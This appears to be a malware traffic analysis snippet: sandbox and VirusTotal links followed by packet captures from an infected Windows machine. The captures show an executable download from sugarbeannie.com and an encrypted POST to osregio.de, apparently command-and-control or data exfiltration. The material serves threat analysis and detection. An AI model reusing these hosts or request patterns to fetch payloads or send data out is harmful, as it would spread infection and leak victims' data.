https://malwr.com/analysis/NzM3YjRiY2NhMmI1NDljNjhjNTkwMDk2NjkzYmFlYjQ/
https://www.virustotal.com/en/file/0858e188c9312ee2e4cf3c85ae4ba11dafba30a1dca36ca40a2d2d5f712f07af/analysis/1477177765/

2016-10-23 00:52:03.435441 IP 192.168.1.102.58739 > 103.44.63.13.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /files/acgi.exe HTTP/1.1
E..Ml.@…$….fg,?..s.Pl.{….(P…….GET /files/acgi.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: sugarbeannie.com
Connection: Keep-Alive

—
E..(..@……..f%..,.v.Pb..:p..AP…`9……..
2016-10-23 00:52:37.816876 IP 192.168.1.102.58742 > 37.17.224.44.80: Flags [P.], seq 0:358, ack 1, win 256, length 358: HTTP: POST /images/file.php HTTP/1.1
E…..@……..f%..,.v.Pb..:p..AP…. ..POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.&.D’.A…7.O7..(…..]….IZ….#n…..H       h..M./..”..`….M.c9…w…”l&.m.!…J/}…x.c……A…..Q.{..y..Q%|.|…p.>..a.@’9,.<..L.P..R.~U..
—
E..(..@……..f%..,.w.P@…….P….m……..
2016-10-23 […]